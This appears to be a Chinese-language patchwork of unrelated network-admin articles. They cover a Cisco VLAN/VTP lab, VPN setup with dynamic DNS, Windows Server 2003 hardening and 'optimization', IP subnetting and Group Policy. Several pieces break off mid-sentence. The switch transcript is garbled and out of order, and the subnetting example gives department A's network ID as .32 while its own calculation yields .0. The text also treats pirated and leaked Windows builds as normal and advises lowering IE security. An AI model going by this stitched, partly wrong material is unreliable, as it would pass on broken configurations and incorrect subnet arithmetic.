　　不管你用RVL@TW.or.OEM＋Corpfiles.or.阿猫阿狗免激活可光盘开机版，用起来都一样好用，前提是作者的功力不是太差，没有乱破解一通。除非你是完美主义者，不然我不认为用起来会和正式版有什么差别。当然，先不论微软会不会耍花招来对付这些海盗的可能性。

VLAN、VLAN Trunk、VTP和STP在交换机的配置中是非常重要的内容，作为初级认证的CCNA考试也对它们的配置提出了基本的要求。本节的实验就是有关这几项配置的基本操作。

 

1.实验目的

通过本实验，读者可以掌握以下技能:

"TEXT-INDENT: 2em">配置VLAN;

通过VLAN Trunk配置跨交换机的VLAN;

配置VTP;

配置STP;

查看上述配置项目的相关信息。

2.设备需求

本实验需要以下设备:

Cisco Catalyst 1900系列交换机2台，型号不限，企业版软件，本实验中使用了1912交换机;

交叉线序网线1条;

1台终端服务器，如Cisco 2509路由器，及用于反向Telnet的相应电缆;

1台带有超级终端程序的PC机，以及Consoie电缆及转接器。

3. 线缆连接及配置说明

如下图所示，用交叉网线把 SW1交换机的Fast Ethernet0/26端口和SW2交换机的Fast Ethernet0/26端口连接起来。

 

图示中略去了作为终端服务器的路由器和作为超级终端的PC机。

 

4. 实验配置及监测结果

 

电缆连接完成后。给所有设备加电，开始进行实验。

 

监测清单记录了本实验的操作。

 

第1段：在SW1和SW2上配置VTP

 

SW1912#conft

Enter configuration commands,one per line.End with CNTL/Z

SW1912(config)#hostn SW1

SW1(config)#vtp?

clientVTP client

domainSet VTP domanin name

passowrd　Set VTP password

pruning　 VTP pruning

serverVTP server

transparent　 VTP transparent

trap　VTP trap

SW1(config-if)#tnmk on

SW1(config-if)#

( Ctrl+Shift+6,x )

Term_Server>2

[Resuming connection 2 to switch2...]

>en

#conft

Enter configuration commands,one per line,End with CNTL/Z

(config)#hostn SW2

SW2(config)#vtp domain cisco

SW2(config)#vtp client

SW2(config)#

  

 第2段：配置VLAN Trunk

 

( Ctrl+Shift+6,x )

Term_Server>2

[Resuming connection 2 to switch2...]

SW1(config)#int fa0/26

SW1(config-if)#trunk?

autoSet DISL state to AUTO

desirable　 Set DISL state to DESIRABLE

nonegotiate Set DISL state to NONEGOTIATE

 

第3段：配置VLAN和查看VTP信息

Term_Server>1 [Resuming connection 1to switch1...] SW1(config)#vlan　10　 name　DEPT1 SW1(config)#vlan　11　 name　DEPT2 SW1(config)#vlan 12　 name　DEPT3 SW1(config)#vlan 13　 name　DEPT4 SW1(config)# SW1#sh vlan VLAN NameStatusPorts ------------------------------------- 1default　Enabled　1-12,AUI,A,B 10　 DEPT1Enabled 11　 DEPT2Enabled 12　 DEPT3Enabled 13　 DEPT4Enabled 1002 fddi-default Suspended 1003 fddi-default Suspended 1004 fddi-default Suspended 1005 fddi-default Suspended ----------------------------- VLAN TypeSAID MTUParent RingNo BridgeNo Stp　Trans1　Trans2 --------------------------------------------------------------------- 1 Ethernet100001 1500　000Unkn 10021003 10Ethernet100010 1500　011Unkn 00 11Ethernet100011 1500　011Unkn 00 12Ethernet100012 1500　011Unkn 00 13Ethernet100013 1500　011Unkn 00 1002 FDDI　101002 15000 00Unkn11003 1003 Token-Ring101003 15001005　10Unkn11002 1004 FDDI-Net　101004 15000 01IEEE0 0 1005 Token-Ring-Net　101005 1500　0 01IEEE0 0 --------------------------------------------------------------------- SW1# Term_Server>2 [Resuming connection 2 to switch2...] SW2#sh vlan VLAN Name　StatusPorts ------------------------------------------ 1 defaultEnabled1-12,AUI,A,B 10DEPT1　Enabled 11DEPT2　Enabled 12DEPT3　Enabled 13DEPT4　Enabled 1002 fddi-defaultSuspended 1003 token-ring-defauSuspended 1004 fddinet-default Suspended 1005 fddi-defaultSuspended ...(有关VLAN的具体信息，如SW1，省略) SW2#sh vtp VTP version:1 Configuration revision:4 Maximum VLANs supported locally:1005 Number of existing VLANs:9 VTP domain name VTP password VTP operating mode　:Client VTP pruning mode: Disabled VTP traps generation: Enabled Configruration last modified by:192.168.1.1 at 00-00-0000 00:00:00 SW2#

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

一、 VPN技术简介　　　

1.1 概述

VPN的全称是Virtual Private Network，翻译过来一般称为虚拟专用网络。其主要作用就是利用公用网络（主要是互联网）将多个私有网络或网络节点连接起来。通过公用网络进行连接可以大大降低通信的成本。

一般来说两台连接上互联网的计算机只要知道对方的IP地址，是可以直接同通信的。不过位于这两台计算机之后的网络是不能直接互联的，原因是这些私有的网络和公用网络使用了不同的地址空间或协议，即私有网络和公用网络之间是不兼容的。VPN的原理就是在这两台直接和公用连接的计算机之间建立一个条专用通道。连个私有网络之间的通信内容经过这两台计算机或设备打包通过公用网络的专用通道进行传输，然后在对端解包，还原成私有网络的通信内容转发到私有网络中。这样对于两个私有网络来说公用网络就像普通的通信电缆，而接在公用网络上的两台计算机或设备则相当于两个特殊的线路接头。

由于VPN连接的特点，私有网络的通信内容会在公用网络上传输，出于安全和效率的考虑一般通信内容需要加密或压缩。而通信过程的打包和解包工作则必须通过一个双方协商好的协议进行，这样在两个私有网络之间建立VPN通道是需要一个专门的过程，依赖于一系列不同的协议。这些设备和相关的设备和协议组成了一个VPN系统。一个完整的VPN系统一般包括以下几个单元：

VPN服务器，一台计算机或设备用来接收和验证VPN连接的请求，处理数据打包和解包工作。
VPN客户端，一台计算机或设备用来发起VPN连接的请求，也处理数据的打包和解包工作。
VPN数据通道，一条建立在公用网络上的数据连接。

注意所谓的服务器和客户端在VPN连接建立之后在通信的角色是一样的，服务器和客户端的区别在于连接是由谁发起的而已。这个概念在两个网络之间的连接尤其明显。

1.2 应用情景

我们可以设想一下的情景：公司的总部在广州，有两个办事处分别在香港和上海，两个办事处的网络需要和总部连接，同时办事处之间也需要相互连接。解决这种问题以前只有一种办法就是分别申请两条专线连接总部和两个办事处，两个办事处之前的通信通过总部转发。长途专线的费用是非常昂贵的，在以前也只有银行、证券公司以及大象企业才有能力负担。

有了互联网和VPN技术之后解决办法可以变成这样，总部通过一条专线和互联网连接，两个办事处分别在本地申请互联网的拨号连接。然后通过在互联网上建立两条VPN通道将三个网络连接起来。这样可以省去长途专线费用。不过互联网的专线连接也不便宜，这种解决方案暂时也只有大中型公司可以负担得起。

那么为什么总部必须使用互联网专线呢，这里牵涉到一个VPN的技术细节，在建立VPN通道的时候，连接的发起者必须知道接受连接的服务器的IP地址，就像我们打电话之前必须知道对方的号码一样。而普通的拨号连接每次上网的IP地址都不相同。不过现在有一个很好的解决方案，通过花生壳动态域名服务可以让一个拨号连接获得的IP地址与一个固定的域名绑定在一起，当建立VPN连接的时候，连接建立者只需要输入连接接受方的域名就可以了。不过接受方的IP地址怎么改变，这个域名都可以解释到接受方当前的Ip地址上。这样就可以省去一条互联网的专线连接，大大降低了通信的费用，这样VPN的解决方案中小型企业也可以负担得起了。
二、 规划VPN接入环境

VPN不但可以用于上述网络对网络的连接，也可以用于单台计算机到网络的连接。在使用VPN的时候我们需要规划一下我们应用环境。

首先我们需要列出需要连接的节点以及节点的类型，以及之间的访问关系，即由谁发起连接和向谁发起连接的问题。这样我们可以确认在我们环境中确定哪些地方需要安装VPN服务器，哪些地方仅仅是配置客户端就可以了。

对于需要安装VPN服务器的地方我们需要一条比较高速的互联网线路，一个固定的IP地址，或者使用花生壳配置一个固定的域名。

下面的介绍时基于微软间操作系统进行的。微软的操作系统中提供VPN服务器功能的有Window 2000 Server和Advance Server，以及比较久的NT Server 4.0，当然这些操作系统也可以作为VPN的客户端。其他的则全部都可以作为VPN客户端。（Window95必须安装Dialup Network 1.3组件）。

确定了服务器和客户端之后，我们还需要规划个节点的IP地址。每个私有网络必须使用不同的地址段，在各自的地址段中必须划分出一部分用于VPN的接入。

以下的介绍我们都是围绕着Window2000的配置进行的。

三、 配置VPN接入服务器

3.1 安装花生壳

只有VPN服务器才需要安装花生壳服务，在规划环境的时候必须为每台VPN服务器申请一个网域护照。这样每台服务器就会有一个不同的域名。在客户端拨号的时候可以通过域名控制连接不同的网络。

一般建议花生壳直接安装在VPN服务器上，并配置为自动启动。这样只要服务器在线域名一定有效。当然如果VPN服务器也提供互联网共享的话也可以将花生壳安装在内部网络的任何一台计算机上，不过必须保证这台计算机不会在服务器在线的时候关机，以免域名失效。

3.2 网络连接准备

作为VPN服务器实际上就是一台路由器，一般需要安装两块或以上的网卡，其中一块网卡负责和互联网连接。另一块网卡则连接内部网络。在进行下面的配置之前首先必须检测服务器和互联网的连接是否正常。

另外很重要的一点就是必须保证服务器和互联网连接的网卡获得的是一个公网地址，即接入的ISP不是使用地址转换技术。检测的办法如下：

在命令行输入ipconfig，检查和互联网连接的网卡的IP地址，如果其地址在下列范围之一则不是公网地址，ISP使用了地址转换技术提供接入服务。这样就必须更换ISP。
10.0.0.0-10.255.255.255
172.16.0.0-172.31.255.255
192.168.0.0-192.168.255.255

3.3 配置路由和远程访问服务

激活路由和远程访问服务
在安装Window 2000 服务器或高级服务器的时候路由和远程服务是默认安装好的，不过没有激活罢了，
 

Windows Server 2003是大家最常用的服务器操作系统之一。虽然它提供了强大的网络服务功能，并且简单易用，但它的安全性一直困扰着众多网管，如何在充分利用Windows Server 2003提供的各种服务的同时，保证服务器的安全稳定运行，最大限度地抵御病毒和黑客的入侵。Windows Server 2003 SP1中文版补丁包的发布，恰好解决这个问题，它不但提供了对系统漏洞的修复，还新增了很多易用的安全功能，如安全配置向导（SCW）功能。利用SCW功能的“安全策略”可以最大限度增强服务器的安全，并且配置过程非常简单，下面就一起来看吧！

　　厉兵秣马 先装“SCW”

　　大家都很清楚，Windows Server 2003系统为增强其安全性，默认情况下，很多服务组件是不被安装的，要想使用，必须手工安装。“SCW”功能也是一样，虽然你已经成功安装了补丁包SP1，但也需要手工安装“安全配置向导（SCW）”组件。

　　进入“控制面板”后，运行“添加或删除程序”，然后切换到“添加/删除Windows组件”页。下面在“Windows组件向导”对话框中选中“安全配置向导”选项，最后点击“下一步”按钮后，就能轻松完成“SCW”组件的安装。

　　安装过程就这么简单，接下来就能根据自身需要，利用“SCW”配置安全策略，增强Windows Server 2003服务器安全。

　　配置“安全策略” 原来如此“简单”

　　在Windows Server 2003服务器中，点击“开始→运行”后，在运行对话框中执行“SCW.exe”命令，就会弹出“安全配置向导”对话框，开始你的安全策略配置过程。当然你也可以进入“控制面板→管理工具”窗口后，执行“安全配置向导”快捷方式来启用“SCW”。

　　1．新建第一个“安全策略”

　　如果你是第一次使用“SCW”功能，首先要为Windows Server 2003服务器新建一个安全策略，安全策略信息是被保存在格式为XML 的文件中的，并且它的默认存储位置是“C:\WINDOWS\security\msscw\Policies”。因此一个Windows Server 2003系统可以根据不同需要，创建多个“安全策略”文件，并且还可以对安全策略文件进行修改，但一次只能应用其中一个安全策略。

　　在“欢迎使用安全配置向导”对话框中点击“下一步”按钮，进入到“配置操作”对话框，因为是第一次使用“SCW”，这里要选择“创建新的安全策略”单选项，点击“下一步”按钮，就开始配置安全策略。

　　2．轻松配置“角色”

　　首先进入“选择服务器”对话框，在“服务器”栏中输入要进行安全配置的Windows Server 2003服务器的机器名或IP地址，点击“下一步”按钮后，“安全配置向导”会处理安全配置数据库。

　　接着就进入到“基于角色的服务配置”对话框。在基于角色的服务配置中，可以对Windows Server 2003服务器角色、客户端角色、系统服务、应用程序，以及管理选项等内容进行配置。

　　所谓服务器“角色”，其实就是提供各种服务的Windows Server 2003服务器，如文件服务器、打印服务器、DNS服务器和DHCP服务器等 ， 一个Windows Server 2003服务器可以只提供一种服务器“角色”，也可以扮演多种服务器角色。点击“下一步”按钮后，就进入到“选择服务器角色”配置对话框，这时需要在“服务器角色列表框”中勾选你的Windows Server 2003服务器所扮演的角色。

　　注意：为了保证服务器的安全，只勾选你所需要的服务器角色即可，选择多余的服务器角色选项，会增加Windows Server 2003系统的安全隐患。如笔者的Windows Server 2003服务器只是作为文件服务器使用，这时只要选择“文件服务器”选项即可。

　　进入“选择客户端功能”标签页，来配置Windows Server 2003服务器支持的“客户端功能”，其实Windows Server 2003服务器的客户端功能也很好理解，服务器在提供各种网络服务的同时，也需要一些客户端功能的支持才行，如Microsoft网络客户端、DHCP客户端和FTP客户端等。根据需要，在列表框中勾选你所需的客户端功能即可，同样，对于不需要的客户端功能选项，建议你一定要取消对它的选择。

　　接下来进入到“选择管理和其它选项”对话框，在这里选择你需要的一些Windows Server 2003系统提供的管理和服务功能，操作方法是一样的，只要在列表框中勾选你需要的管理选项即可。点击“下一步”后，还要配置一些Windows Server 2003系统的额外服务，这些额外服务一般都是第三方软件提供的服务。

　　然后进入到“处理未指定的服务”对话框，这里“未指定服务”是指，如果此安全策略文件被应用到其它Windows Server 2003服务器中，而这个服务器中提供的一些服务没有在安全配置数据库中列出，那么这些没被列出的服务该在什么状态下运行呢？在这里就可以指定它们的运行状态，建议大家选中“不更改此服务的启用模式”单选项。最后进入到“确认服务更改”对话框，对你的配置进行最终确认后，就完成了基于角色的服务配置。

　　3．配置网络安全

　　以上完成了基于角色的服务配置。但Windows Server 2003服务器包含的各种服务，都是通过某个或某些端口来提供服务内容的，为了保证服务器的安全，Windows防火墙默认是不会开放这些服务端口的。下面就可以通过“网络安全”配置向导开放各项服务所需的端口，这种向导化配置过程与手工配置Windows防火墙相比，更加简单、方便和安全。

　　在“网络安全”对话框中，要开放选中的服务器角色，Windows Server 2003系统提供的管理功能以及第三方软件提供的服务所使用的端口。点击“下一步”按钮后，在“打开端口并允许应用程序”对话框中开放所需的端口，如FTP服务器所需的“20和21”端口，IIS服务所需的“80”端口等，这里要切记“最小化”原则，只要在列表框中选择要必须开放的端口选项即可，最后确认端口配置，这里要注意：其它不需要使用的端口，建议大家不要开放，以免给Windows Server 2003服务器造成安全隐患。

　　4．注册表设置

　　Windows Server 2003服务器在网络中为用户提供各种服务，但用户与服务器的通信中很有可能包含“不怀好意”的访问，如黑客和病毒攻击。如何保证服务器的安全，最大限度地限制非法用户访问，通过“注册表设置”向导就能轻松实现。

　　利用注册表设置向导，修改Windows Server 2003服务器注册表中某些特殊的键值，来严格限制用户的访问权限。用户只要根据设置向导提示，以及服务器的服务需要，分别对“要求SMB安全签名”、“出站身份验证方法”、“入站身份验证方法”进行严格设置，就能最大限度保证Windows Server 2003服务器的安全运行，并且免去手工修改注册表的麻烦。

　　5．启用“审核策略”

　　聪明的网管会利用日志功能来分析服务器的运行状况，因此适当的启用审核策略是非常重要的。SCW功能也充分的考虑到这些，利用向导化的操作就能轻松启用审核策略。

　　在“系统审核策略”配置对话框中要合理选择审核目标，毕竟日志记录过多的事件会影响服务器的性能，因此建议用户选择“审核成功的操作”选项。当然如果有特殊需要，也可以选择其它选项。如“不审核”或“审核成功或不成功的操作”选项。

　　6．增强IIS安全

　　IIS服务器是网络中最为广泛应用的一种服务，也是Windows系统中最易受攻击的服务。如何来保证IIS服务器的安全运行，最大限度免受黑客和病毒的攻击，这也是SCW功能要解决的一个问题。利用“安全配置向导”可以轻松的增强IIS服务器的安全，保证其稳定、安全运行。

　　在“Internet信息服务”配置对话框中，通过配置向导，来选择你要启用的Web服务扩展、要保持的虚拟目录，以及设置匿名用户对内容文件的写权限。这样IIS服务器的安全性就大大增强。

　　小提示：如果你的Windows Server 2003服务器没有安装、运行IIS服务，则在SCW配置过程中不会出现IIS安全配置部分。

　　完成以上几步配置后，进入到保存安全策略对话框，首先在“安全策略文件名”对话框中为你配置的安全策略起个名字，最后在“应用安全策略”对话框中选择“现在应用”选项，使配置的安全策略立即生效。

　　利用SCW增强Windows Server 2003服务器的安全性能就这么简单，所有的参数配置都是通过向导化对话框完成的，免去了手工繁琐的配置过程，SCW功能的确是安全性和易用性有效的结合点。如果你的Windows Server 2003系统已经安装了SP1补丁包，不妨试试SCW吧

把一个大网缩小为若干小网，叫子网（作动词），而要把一个或几个小网扩大为一个大网，叫超网，后者一般应用于电信等其它领域，我们不作讨论。
划分IP子网，有利于我们搞好系统维护，合理配置系统资源，减少资源浪费，但我们有很多初入此道的网管们对怎样做好这一项必修课心中没底，这里，我们就一个实例来讲讲子网划分的具体方法，希望对广大朋友有所帮助。
我们先假定一个环境，一个小小的公司中，目前有5个部门A至E，其中：Ａ部门有１０台ＰＣ（Ｈｏｓｔ，主机），Ｂ部门２０台，Ｃ部门３０台，Ｄ部门１５台，Ｅ部门２０台，然后CIO分配了一个总的网段192．１６８．２．０／２４给你，作为ADMIN，你的任务是为每个部门划分单独的网段，你该怎样做呢？
实际上，这就是一个很典型的IP子网划分的问题，其中，１９２．１６８．２．０／２４是一个Ｃ类网段，24是表示子网掩码中１的个数是24个，这是２５５．２５５．２５５．０的另外一种表示方法，每一个255表示一个二进制的8个1，最后一个0表示二进制的8个0，在计算机语言中以二进制表示为11111111 11111111 11111111 00000000，0表示可容纳的主机的个数。要划分子网，必须制定每一个子网的掩码规划，换句话说,就是要确定每一个子网能容纳的最多的主机数，即0的个数，显然，应该以这几个部门中拥有主机数量最多的为准，在本例中，C部门有30台主机，那么我们在操作中可以套用这样一个经典公式：

2N-2=Hosts 2N-2=30 N=5

N代表掩码中0的个数，5个零则意味着二进制掩码为11100000，即十进制的224．加上前面24个1，1 的总数为27个。
该掩码十进制表示为：２５５．２５５．２５５．２２４／２７；
确定掩码规则以后，就要确认每一个子网的具体地址段。
以下让我们从A部门开始，一步一步DIY，其余B—E部门的操作可参照进行。
第一步：确定A部门的网络ID
网络ID，即本部门所在的网段，是由IP地址与掩码作"与运算"的结果。"与运算"是一种逻辑算法，其规则是：1与1为1；0与0 、0与1、1与0的结果均为0。
已知：当前的IP地址192.168.2.0的最后一位是0，二进制表示为00000000；而我们已经算出的掩码255.255.255.224的最后一位是224，二进制表示为11100000。
下面让我们来做一个与运算。要注意，由于掩码的后五位为０，那么IP地址只有前三位参加运算，而后五位仅仅列出，不参加运算。⑴
　　　０　０　０　　０　０　０　０　０
与　　１　１　１　　０　０　０　０　０
　　　　　０　０　０　　０　０　０　０　０　（十进制：０）
⑵
　　　０　０　１　　０　０　０　０　０
与　　１　１　１　　０　０　０　０　０
　　　　　０　０　１　　０　０　０　０　０　（十进制：３２）
．．．．．．．

这样就得到了A部门的网络ID为192.168.2.32/27，依此类推，根据主机数最多为30个的原则，B部门为192.168.2.64/27，C部门为192.168.2.96/27等等。

第二步，确定Ａ部门的地址范围。

细心的朋友可能会发现，如果Ａ部门的网络ＩＤ从３２开始、并且主机数为３０的时候，似乎Ｂ部门的ＩＤ应该是从６２开始才对，为什么Ｂ部门的ＩＤ为６４呢？这是因为，根据局域网规范，网络中必须要有两个保留地址作为网络专用，一个叫网络回环地址，代表网络本身，其地址全为０；一个叫广播地址，专用于主机进行数据广播。其地址全为１，这两个地址是不得被主机占用或分配的，在本例中，Ａ部门网络地址全为０时（只是后面５位！），二进制表示为00100000，
其十进制值为32；当网络地址全为1时，二进制表示为00111111，十进制值为63；由此可见：192.168.2.32仅仅是Ａ部门网络的本网地址(即网络ID)，而192.168.2.63为Ａ部门网络的广播地址。现在再看看前面提到的公式？之所以要减一个２，就是要减去不能被分配和占用的这两个地址。所以，Ａ部门实际上可分配给每个主机的地址范围为192.168.2.33 － 192.168.2.62，掩码均为255.255.255.224；所以，Ｂ部门的网络ＩＤ是从６４起算的，与运算的图示如下：
　　　０　１　０　　０　０　０　０　０
与　　１　１　１　　０　０　０　０　０
　　　　　０　１　０　　０　０　０　０　０　（十进制：６４）

显然，192.168.2.64是Ｂ部门网络的本网地址，并且不难算出，192.168.2.95是Ｂ部门网络的广播地址，Ｂ部门实际上可分配给每个主机的地址范围为192.168.2.65 － 192.168.2.94，同理可参照计算出Ｃ－Ｅ部门的地址范围。
于是，你圆满的完成了任务，可ＣＩＯ还想考验一下你的能力，又提出了两个问题：
１、 公司各部门现有条件下的网络可扩展性怎样？
２、 公司目前可支持的子网数到底有多大？
不要紧张，这些纸老虎都是一捅就破的。第一个问题，所谓可扩展性，其实就是说在目前网络规划的条件下，各部门所能增加的主机数量，还不明白吗？就是有效的主机数减去现有主机数的值，对Ａ部门而言，３０－１０＝２０，那么，Ａ部门还能增加２０台主机，当然Ｃ部门就无法再增加了。
对第二个问题，我们仍然要用到那个熟悉的经典公式：
2N-2=可支持的子网数 23-2=6
这里的N表示掩码中借位的个数，掩码从CIO给定的的24位（24个1）变成了27位（27个1），"借用"了三位，所以N用3代换（至于为什么要减2，各位朋友可以自己思考一下），结果为6，表示一共可以划分6个子网，而当前只有5个部门，已划分了5个子网，还可以再增加一个部门，再划一个子网。
到此，CIO交办的任务全部完成，等着提职加薪吧！
事情"似乎"完满解决了，可能朋友们还有觉得本例中有那么一些说不清的地方........
如果C部门的主机数不是刚好30台，而是31，33等无法整除的数，怎么办？其实，在计算的时候，用常规算法如果出现了小数等无法除尽的时候，只需要把小数收上来就行了，注意，不是四舍五入，比如结果为5.3或5.2时，必须收整，使N为6，目的是为了让子网可容纳的主机只多不少，这样才能最大限度的保证网络ID的正确。
使朋友们困惑的可能还有一个非技术性问题，好像是由一个事先的网络规划来决定单位内部门的组成，而不是由单位本身的机构数量来决定可购买的主机数量？正是这样，在网络化程度已很高的国外，一家公司，尤其是IT公司，在筹建之初,为了合理配置系统资源，减少资源浪费，必须是网络规划先行，然后根据该规划结合其它要求来配置部门资源，而国内由于网络开发时间短，应用层次相对较低，再加上传统的管理模式是以人定岗，以人定事，于是以人定机（电脑）也是顺理成章的事。这是题外话了。

win2003优化

随着windows server 2003的上市在即，很多人可以用上的泄漏的版本，相对于工作站系统，服务器在由于做了更多的内核优化，所以在稳定性和安全性方面有很大的提高。但是，很多人并不是需要Server的全部功能的，而且Server系统关闭了某些工作站系统所需要的服务，下面，我们将对如何优化windows server 2003并转换成一个工作站系统做出一些介绍。
1.禁用配置服务器向导
由于不需要服务器设置功能，首先我们先禁止“配置你的服务器”（Manage Your Server）向导的出现，你可以在控制面板（Control Panel） -> 管理员工具（Administrative Tools ）-> 管理你的服务器（Manage Your Server）运行它，然后在窗口的左下角复选“登录时不要显示该页”（Don't display this page at logon）。
2.建立一个新的用户账号
windows server 2003不支持类似于Windows XP的登录欢迎屏幕。你可以在首次进入系统后建立一个有你个性的新用户账号。
打开“开始”（Start） -> “运行”（Run） -> 键入“lusrmgr.msc ”，你将看到本地用户和组（Local Users and Groups ），

右键点击左边窗口的“用户”（Users），选择“新用户”（New User）.在弹出的对话框中输入账号信息,然后点击“建立”（Great）。这样你的账号就可用了，当然，你可以选择把你的账号添加到管理员组，右键点击你新建的用户。然后选择“属性”（Properties） -> 点击“隶属于” on Member of tab -> “添加”Add.. -> “高级”Advanced -> “现在查找”Find Now 。

在查找结果对话框中双击“管理员”（Administrators），在点击两次“确定”（Ok）后关闭“本地用户和组”（Local Users and Groups window ），现在你将可以注销Administrator用户用你自己的账号登录系统。

3.禁用Internet Explorer Enhanced Security
作为新windows组件出现的IE安全插件－－Internet Explorer Enhanced Security默认把你IE安全设置为最高。这样你将在访问站点弹出询问框并对你浏览网页及文件下载做出阻止的行为。我们其实不一定需要这个组件。
我们首先禁止询问框的出现,在弹出的对话框中复选”以后不要显示这个信息“ （In the future, do not show this message）

然后，我们可以在IE工具选项中自定义设置IE的安全级别。在”安全“（Security）选项卡上拉动滚动条把Internet区域安全设置为”中“（Medium），这个级别将适合大多数人，要是你有特别要求，这个步骤将不适合你。
通过对IE安全的设置，你现在安装可以上Sun's Java VM!
当然，你甚至可以在控制面板－－添加程序－－添加或删除Windows组件中卸载Internet Explorer Enhanced Security 。
4.安装Java VM
Windows server 2003没有集成MS Java VM或Sun Java VM,你可以自行下载并安装它。

5.禁止关机事件跟踪
关机事件跟踪（Shutdown Event Tracker）也是Windows server 2003区别于其他工作站系统的一个设置，对于服务器来说这是一个必要的选择，但是对于工作站系统却没什么用，我们同样可以禁止它。
打开”开始“Start ->”运行“ Run ->输入”gpedit.msc “，在出现的窗口的左边部分，选择 ”计算机配置“（Computer Configuration ）-> ”管理模板“（Administrative Templates ）-> ”系统“（System）,在右边窗口双击“Shutdown Event Tracker”

在出现的对话框中选择“禁止”（Disabled），点击然后“确定”（OK）保存后退出

这样，你将看到类似于windows 2000的关机窗口

6.启用硬件和DirectX加速
★硬件加速：桌面点击右键－－属性（Properties） -> 设置（Settings ）－－高级（ Advanced ）－－疑难解答（Troubleshoot）。把该页面的硬件加速滚动条拉到“完全”（ Full），最好点击“确定”（OK）保存退出。这期间可能出现一瞬的黑屏是完全正常。

★DirectX加速：打开“开始”（Start） -> “运行”（Run），键入“dxdiag”并回车打开“DirectX 诊断工具”（DirectX Tools），在“显示”（Display）页面，点击DirectDraw, Direct3D and AGP Texture 加速三个按钮启用加速。

7.允许声音加速
如果你使用的是Windows server 2003标准版请从第二步xx作，因为标准版已允许声音服务。
★打开“开始”（Start） -> “运行”（Run），键入“Services.msc ”，在出现的窗口中找到“Windows Audio”并双击它，然后在启动模式（startup type ）的下拉菜单选择“自动”（Automatic），并点击“应用”（Apply） ->“开始”（Start） -> “确定”（OK）

★打开“开始”（Start） -> “运行”（Run），键入“dxdiag”并回车打开“DirectX 诊断工具”（DirectX Tools），在“Sound”（Display）页面，把“声音的硬件加速级别”（Hardware Sound Acceleration Level）滚动条拉到“完全加速”（ Full Acceleration）。

8.启用桌面主题
也许你对WINDOWS经典的桌面已经感到厌烦的话，你就要考虑启用桌面主题了，Windows server 2003默认是关闭此服务的。
打开“开始”（Start） -> “运行”（Run），键入“Services.msc

Windows组策略应用全攻略
一、什么是组策略 　　
（一）组策略有什么用?　
　说到组策略，就不得不提注册表。注册表是Windows系统中保存系统、应用软件配置的数据库，随着Windows功能的越来越丰富，注册表里的配置项目也越来越多。很多配置都是 可以自定义设置的，但这些配置发布在注册表的各个角落，如果是手工配置，可想是多么困难和烦杂。而组策略则将系统重要的配置功能汇集成各种配置模块，供管理人员直接使用，从而达到方便管理计算机的目的。　
　简单点说，组策略就是修改注册表中的配置。当然，组策略使用自己更完善的管理组织方法，可以对各种对象中的设置进行管理和配置，远比手工修改注册表方便、灵活，功能也更加强大。
　　（二）组策略的版本　
　大部分Windows 9X/NT用户可能听过“系统策略”的概念，而我们现在大部分听到的则是“组策略”这个名字。其实组策略是系统策略的更高级扩展，它是由Windows 9X/NT的“系统策略”发展而来的，具有更多的管理模板和更灵活的设置对象及更多的功能，目前主要应用于Windows 2000/XP/2003系统。　
　早期系统策略的运行机制是通过策略管理模板，定义特定的.POL（通常是Config.pol）文件。当用户登录的时候，它会重写注册表中的设置值。当然，系统策略编辑器也支持对当前注册表的修改，另外也支持连接网络计算机并对其注册表进行设置。而组策略及其工具，则是对当前注册表进行直接修改。显然，Windows 2000/XP/2003系统的网络功能是其最大的特色之处，其网络功能自然是不可少的，因此组策略工具还可以打开网络上的计算机进行配置，甚至可以打开某个Active Directory 对象（即站点、域或组织单位）并对它进行设置。这是以前“系统策略编辑器”工具无法做到的。　　无论是系统策略还是组策略，它们的基本原理都是修改注册表中相应的配置项目，从而达到配置计算机的目的，只是它们的一些运行机制发生了变化和扩展而已。　
　二、组策略中的管理模板　　在Windows 2000/XP/2003目录中包含了几个 .adm 文件。这些文件是文本文件，称为“管理模板”，它们为组策略管理模板项目提供策略信息。　　在Windows 9X系统中，默认的admin.adm管理模板即保存在策略编辑器同一个文件夹中。而在Windows 2000/XP/2003的系统文件夹的inf文件夹中，包含了默认安装下的4个模板文件，分别为：　　
1）System.adm：默认情况下安装在“组策略”中，用于系统设置。　
2）Inetres.adm：默认情况下安装在“组策略”中；用于Internet Explorer策略设置。　3）Wmplayer.adm：用于Windows Media Player 设置。　　
4）Conf.adm：用于NetMeeting 设置。　　
在Windows 2000/XP/2003的组策略控制台中，可以多次添加“策略模板”，而在Windows 9X下，则只允许当前打开一个策略模板。下面介绍使用策略模板的方法。
   首先在Windows 2000/XP/2003组策略控制台中使用如下：首先运行“组策略”程序，然后选择“计算机配置”或者“用户配置”下的“管理模板”，按下鼠标右键，在弹出的菜单中选择“添加/删除模板”.然后单击“添加”按钮，在弹出的对话框中选择相应的.adm文件。单击“打开”按钮，则在系统策略编辑器中打开选定的脚本文件，并等待用户执行。　　返回到“组策略”编辑器主界面后，依次打开目录“本地计算机策略→用户配置→管理模板”，再点击相应的目录树，就会看到我们新添加的管理模板所产生的配置项目了（为了便于本文后面的实例大家能一起动手操作，建议添加除默认模板文件的其它模板文件）。　　再来看Windows 9X下的组策略编辑器。首先在组策略编辑器中的“文件”菜单中选择“关闭”，以便将当前脚本关闭，然后再在“选项”菜单中选择“模板”然后单击“打开模板”按钮，在弹出的对话框中选择相应的.adm文件并单击“打开”按钮，则在编辑器中打开选定的脚本文件并等待用户执行。　　
  三、运行组策略　　
（一）Windows 9X策略编辑器　　
    按操作系统的不同，策略编辑工具分为两种，一种为Windows 2000/XP/2003组策略管理控制台，它在系统安装时已经默认安装上了；另外一种就是Windows 9X的系统策略编辑器，它在系统安装时并不被安装，程序文件在Windows安装盘上的\tools\reskit\netadmin\poledit目录下，它包括Poledit.exe、Poledit.inf、Windows.adm等文件。　
　如果是Windows 9X系统通过下面的方法，则可以进行正规的安装过程。　　
1．在控制面板中，双击“添加/删除程序”图标，单击“安装Windows”标签，然后单击“从磁盘安装”选项。　
　2．在从磁盘安装对话框中，单击“浏览”按钮并指定Windows 9X安装光盘的tools\